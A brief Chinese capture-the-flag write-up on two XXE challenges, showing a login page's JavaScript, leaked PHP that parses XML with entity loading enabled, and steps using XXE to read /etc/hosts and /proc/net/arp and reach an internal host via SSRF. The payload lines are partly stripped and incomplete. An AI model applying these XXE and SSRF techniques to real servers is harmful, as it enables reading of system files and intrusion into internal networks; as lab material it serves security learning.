某个(忘了)比赛的两道XML

Fake XML Cookbook

F12 查看源码：

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "" + username + "" + password + ""; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

可以看到传输的数据是xml类型

payload打一下：

 
]>
&xxe;111

得flag

True XML Cookbook

首先尝试直接读/flag文件，回显了报错信息，但是发现可以读doLogin文件：

]>
&file;1

得源码：

//doLogin.php
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("%d%s",1,$username);
	}else{
		$result = sprintf("%d%s",0,$username);
	}	
}catch(Exception $e){
	$result = sprintf("%d%s",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

最终是利用ssrf读内网文件：

// /etc/hosts
127.0.0.1	localhost
::1		localhost ip6-localhost ip6-loopback
fe00::0		ip6-localnet
ff00::0		ip6-mcastprefix
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
173.17.80.9		osrc

内网ip，173.17.80.9

// /proc/net/arp
IP address       HW type     Flags       HW address            Mask     Device
173.17.80.2      0x1         0x2         02:42:ad:11:50:02     *        eth0
173.17.80.12     0x1         0x2         02:42:ad:11:50:0c     *        eth0

最后试了173.17.80.10可以得flag